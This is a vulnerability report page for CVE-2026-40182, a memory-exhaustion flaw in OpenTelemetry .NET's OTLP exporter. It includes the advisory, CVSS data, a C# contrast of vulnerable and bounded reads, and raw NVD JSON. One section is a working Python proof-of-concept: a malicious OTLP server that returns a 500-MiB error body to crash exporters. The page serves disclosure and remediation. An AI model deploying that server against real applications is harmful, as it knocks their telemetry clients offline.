Security Vulnerability Report
CVE-2026-40182 CVSS 5.3 MEDIUM

Published: 2026-04-23 18:16:28
Last Modified: 2026-04-29 13:52:27

Description

OpenTelemetry dotnet is a .NET telemetry framework. In versions from 1.13.1 to before 1.15.2, when exporting telemetry to a back-end/collector over gRPC or HTTP using the OpenTelemetry Protocol (OTLP), an unsuccessful request (HTTP 4xx or 5xx) causes the response body to be read into memory with no upper bound on the number of bytes consumed (CWE-789, memory allocation with excessive size values). This can exhaust memory in the consuming application if the configured back-end/collector endpoint is attacker-controlled, or a network attacker can MitM the connection, and an extremely large body is returned in the response. The impact is limited to availability; for a TLS-protected endpoint the MitM precondition requires defeating TLS, so plaintext OTLP endpoints and compromised or malicious collectors are the realistic exposure. This vulnerability is fixed in 1.15.2.
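The unbounded error-body read the advisory describes, next to a bounded alternative, as an added C# example: this is illustrative code written for this page, not OpenTelemetry .NET's exporter code and not its actual patch in 1.15.2. `OtlpErrorBody`, `ReadUnboundedAsync`, `ReadBoundedAsync` and `ExportAsync` are hypothetical names, and the 4096-byte cap is an assumed value.

```csharp
// Added illustrative example (not OpenTelemetry .NET's own code). Shows the
// unbounded read pattern behind CVE-2026-40182 beside a bounded read.
// Assumed: an HttpClient-based OTLP/HTTP exporter; all names are hypothetical.
using System;
using System.IO;
using System.Net.Http;
using System.Text;
using System.Threading;
using System.Threading.Tasks;

public static class OtlpErrorBody
{
    // Vulnerable pattern: the whole error body is buffered regardless of size.
    // ReadAsStringAsync buffers up to int.MaxValue bytes by default, so an
    // attacker-controlled collector turns a 500 into an unbounded allocation (CWE-789).
    public static async Task<string> ReadUnboundedAsync(HttpResponseMessage response)
    {
        return await response.Content.ReadAsStringAsync();
    }

    // Hardened pattern: read at most maxBytes for diagnostics and drop the rest.
    // The status code is all the exporter needs for its retry decision; the
    // body is only useful for logging.
    public static async Task<string> ReadBoundedAsync(
        HttpResponseMessage response, int maxBytes = 4096, CancellationToken ct = default)
    {
        // Fast reject when the server declares a body larger than the cap.
        // Not sufficient on its own: a chunked response carries no Content-Length.
        long? declared = response.Content.Headers.ContentLength;
        if (declared.HasValue && declared.Value > maxBytes)
        {
            return $"<error body of {declared.Value} bytes not read; cap is {maxBytes}>";
        }

        using Stream body = await response.Content.ReadAsStreamAsync();
        byte[] buffer = new byte[maxBytes];
        int total = 0;
        while (total < maxBytes)
        {
            int n = await body.ReadAsync(buffer.AsMemory(total, maxBytes - total), ct);
            if (n == 0) break;   // body complete or connection closed
            total += n;
        }
        // Bytes beyond maxBytes are never buffered. Disposing a response with an
        // unread body makes SocketsHttpHandler drain at most MaxResponseDrainSize
        // (default 1 MiB) and then close the connection rather than buffer the rest.
        string text = Encoding.UTF8.GetString(buffer, 0, total);
        return total == maxBytes ? text + "...(truncated)" : text;
    }

    // Usage sketch: a hypothetical exporter send path that only inspects the
    // body on non-2xx responses.
    public static async Task<bool> ExportAsync(HttpClient client, HttpRequestMessage request)
    {
        // ResponseHeadersRead stops HttpClient from buffering the body itself;
        // the default ResponseContentRead would buffer up to MaxResponseContentBufferSize.
        using HttpResponseMessage response =
            await client.SendAsync(request, HttpCompletionOption.ResponseHeadersRead);
        if (response.IsSuccessStatusCode) return true;

        string detail = await ReadBoundedAsync(response);
        Console.Error.WriteLine($"OTLP export failed: {(int)response.StatusCode} {detail}");
        return false;
    }
}
```

Two things carry the fix: sending with ResponseHeadersRead so HttpClient does not buffer the body on its own, and then reading a fixed number of bytes from the stream; checking Content-Length alone is not enough because a chunked error response declares no length. For applications that cannot upgrade immediately, OtlpExporterOptions.HttpClientFactory (OTLP/HTTP only) lets you supply an HttpClient with MaxResponseContentBufferSize set, but whether that limit constrains the exporter's read path depends on how the exporter consumes the body, so treat it as defence in depth and upgrade to 1.15.2.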

CVSS Details

CVSS Score
5.3 (CNA-supplied, secondary); 5.9 (NVD, primary)
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H (CNA, secondary)
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H (NVD, primary)
Weakness
CWE-789 (Memory Allocation with Excessive Size Values)

Configurations (Affected Products)

cpe:2.3:a:opentelemetry:opentelemetry:*:*:*:*:*:.net:*:* - VULNERABLE
OpenTelemetry dotnet >= 1.13.1, < 1.15.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# Simulation of a malicious OTLP/HTTP back-end that triggers the vulnerability:
# it accepts the exporter's POST and answers with an HTTP 500 whose body is far
# larger than the client should ever buffer. Point the exporter at
# http://<host>:4318/v1/traces. A raw HTTP/1.1 responder cannot exercise the
# gRPC exporter, since OTLP/gRPC on 4317 speaks HTTP/2.
import socket

HOST = "0.0.0.0"
PORT = 4318                    # default OTLP/HTTP port
BODY_SIZE = 500 * 1024 * 1024  # 500 MiB error body
CHUNK = 64 * 1024              # BODY_SIZE is an exact multiple of CHUNK


def drain_request(conn):
    # Read the exporter's headers and Content-Length body so the client is not
    # still blocked on send when the response arrives.
    buf = b""
    while b"\r\n\r\n" not in buf:
        data = conn.recv(4096)
        if not data:
            return
        buf += data
    head, _, rest = buf.partition(b"\r\n\r\n")
    length = 0
    for line in head.split(b"\r\n"):
        if line.lower().startswith(b"content-length:"):
            length = int(line.split(b":", 1)[1].strip())
    remaining = length - len(rest)
    while remaining > 0:
        data = conn.recv(min(remaining, 65536))
        if not data:
            return
        remaining -= len(data)


def malicious_server():
    server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    server_socket.bind((HOST, PORT))
    server_socket.listen(1)
    print(f"Malicious server listening on {PORT}...")
    while True:
        client_socket, addr = server_socket.accept()
        print(f"Connection from {addr}")
        try:
            drain_request(client_socket)
            # HTTP 500 with a Content-Length the vulnerable exporter will try to buffer.
            response_headers = (
                "HTTP/1.1 500 Internal Server Error\r\n"
                "Content-Type: application/x-protobuf\r\n"
                f"Content-Length: {BODY_SIZE}\r\n"
                "Connection: close\r\n"
                "\r\n"
            )
            client_socket.sendall(response_headers.encode())
            print("Sending headers...")
            # Stream the body in chunks so the server itself never holds 500 MiB.
            chunk = b"A" * CHUNK
            for _ in range(BODY_SIZE // CHUNK):
                client_socket.sendall(chunk)
            print("Sent large payload. Memory exhaustion likely triggered on client.")
        except OSError as exc:
            # The client dropping the connection (e.g. after running out of memory)
            # surfaces here; keep serving the next exporter retry.
            print(f"Client went away: {exc}")
        finally:
            client_socket.close()


if __name__ == "__main__":
    malicious_server()

References

https://github.com/open-telemetry/opentelemetry-dotnet/security/advisories/GHSA-q834-8qmm-v933 (Vendor Advisory)
https://github.com/open-telemetry/opentelemetry-dotnet/pull/6564 (Issue Tracking, Patch)
https://github.com/open-telemetry/opentelemetry-dotnet/pull/7017 (Issue Tracking, Patch)
https://github.com/open-telemetry/opentelemetry-proto/pull/781 (Issue Tracking)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-40182", "sourceIdentifier": "[email protected]", "published": "2026-04-23T18:16:28.130", "lastModified": "2026-04-29T13:52:26.743", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenTelemetry dotnet is a dotnet telemetry framework. From 1.13.1 to before 1.15.2, When exporting telemetry to a back-end/collector over gRPC or HTTP using OpenTelemetry Protocol format (OTLP), if the request results in a unsuccessful request (i.e. HTTP 4xx or 5xx), the response is read into memory with no upper-bound on the number of bytes consumed. This could cause memory exhaustion in the consuming application if the configured back-end/collector endpoint is attacker-controlled (or a network attacker can MitM the connection) and an extremely large body is returned by the response. This vulnerability is fixed in 1.15.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.6, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-789"}]}], "configurations": [{"nodes": 
[{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:opentelemetry:opentelemetry:*:*:*:*:*:.net:*:*", "versionStartIncluding": "1.13.1", "versionEndExcluding": "1.15.2", "matchCriteriaId": "5539A01E-6E54-4AE2-8D72-6E5C15C01C61"}]}]}], "references": [{"url": "https://github.com/open-telemetry/opentelemetry-dotnet/pull/6564", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://github.com/open-telemetry/opentelemetry-dotnet/pull/7017", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://github.com/open-telemetry/opentelemetry-dotnet/security/advisories/GHSA-q834-8qmm-v933", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://github.com/open-telemetry/opentelemetry-proto/pull/781", "source": "[email protected]", "tags": ["Issue Tracking"]}]}}